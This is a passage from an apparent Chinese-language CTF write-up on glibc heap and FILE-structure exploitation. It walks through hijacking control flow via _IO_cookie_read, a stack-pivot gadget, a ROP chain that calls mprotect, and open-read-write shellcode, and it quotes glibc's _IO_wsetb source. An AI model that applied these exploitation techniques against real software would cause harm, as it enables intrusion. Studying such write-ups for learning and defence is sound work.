\u63a5\u7740\u8c03\u7528\u7684\u662f_IO_cookie_read\uff0c\u8be5\u51fd\u6570\u53ef\u4ee5\u5e2e\u52a9\u6211\u4eec\u52ab\u6301\u7a0b\u5e8f\u63a7\u5236\u6d41<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u7a0b\u5e8f\u786e\u5b9e\u6309\u7167\u9884\u671f\u6267\u884c\u5230\u4e86magic gadget\uff08\u8fd9\u91cc\u91cd\u65b0\u5f00\u4e86\u4e00\u904dgdb\uff0c\u6240\u4ee5\u5806\u5730\u5740\u53d8\u4e86\uff09\uff0c\u8fd9\u6bb5magic gadget\u786e\u5b9e\u5f88\u795e\u5947\uff0c\u9996\u5148\u770b\u4e00\u770b\u8fd9\u4e2a\u5730\u5740\u5f80\u4e0b\u7684\u4e00\u5757\u90fd\u5b58\u7684\u4ec0\u4e48\u503c<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u5176\u5b9e\u5bf9\u5e94\u4e86exp\u91cc\u7684\u8fd9\u90e8\u5206\u4e1c\u897f<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u5176\u4ed6gadget\u4e0d\u518d\u679a\u4e3e<\/p>\n\n\n\n
\u6240\u4ee5call\u7684\u65f6\u5019call\u7684\u5b9e\u9645\u662fa30\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662fmov rsp\uff0crdx\uff0c\u5b9e\u9645\u4e0a\u662f\u4e00\u4e2a\u6808\u8fc1\u79fb\u7684\u6548\u679c\uff0c\u53ef\u4ee5\u770b\u5230\u6267\u884c\u540ersp\u6307\u5411\u4e86\u539f\u5148rdx\u7684\u4f4d\u7f6e\uff08\u5806\u5730\u5740\uff09\uff0c\u53c8\u7531\u4e8e\u63a5\u4e0b\u6765\u67092\u4e2aret\uff0c\u4e00\u4e2apop\u548c\u4e00\u4e2aadd rsp\uff0c0x20\uff0c\u6545rsp\u4e00\u5171\u4f1a\u589e\u52a00x38\uff0c\u5373\u6307\u54110x563a6912fa48\uff0c\u8fd9\u91cc\u5b58\u653e\u7684\u662fpop rdi,ret\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u4e4b\u540e\u5c31\u662f\u8c03\u7528\u9884\u5148\u51c6\u5907\u597d\u7684ROP\u94fe\uff0c\u8bbe\u7f6e\u53c2\u6570\u5e76\u8c03\u7528mprotect\u66f4\u6539\u5806\u6743\u9650\uff08\u5176\u5b9e\u8fd9\u91cc\u76f4\u63a5\u6253ROP\u94fe\u8fdb\u884corw\u5c31\u53ef\u4ee5\u4e86\uff0c\u8fd9\u91cc\u663e\u5f97\u6709\u4e9b\u591a\u6b64\u4e00\u4e3e\uff09<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u6700\u540e\u8fd4\u56de\u5230chain+0x200\u7684\u4f4d\u7f6e\u53bb\u6267\u884corw\u7684shellcode<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u503c\u5f97\u4e00\u63d0\u7684\u662f\uff0c\u6709\u65f6\u5019\u4f1a\u7ed5\u8fc7\u4e00\u4e2a\u4fdd\u62a4\uff0c\u6240\u4ee5\u4fdd\u9669\u8d77\u89c1\u53ef\u4ee5\u8bbe\u7f6eflag2\u4e3a8\uff0c\u4f46\u8fd9\u9898\u6211\u628a\u4ed6\u6ce8\u91ca\u6389\u4e86\u4e5f\u80fd\u901a<\/p>\n\n\n\n
void\n_IO_wsetb (FILE *f, wchar_t *b, wchar_t *eb, int a)\n{\n if (f->_wide_data->_IO_buf_base && !(f->_flags2 & _IO_FLAGS2_USER_WBUF))\n free (f->_wide_data->_IO_buf_base); \/\/ \u5176\u4e0d\u4e3a0\u7684\u65f6\u5019\u4e0d\u8981\u6267\u884c\u5230\u8fd9\u91cc\n f->_wide_data->_IO_buf_base = b;\n f->_wide_data->_IO_buf_end = eb;\n if (a)\n f->_flags2 &= ~_IO_FLAGS2_USER_WBUF;\n else\n f->_flags2 |= _IO_FLAGS2_USER_WBUF;\n}<\/code><\/pre>\n\n\n\n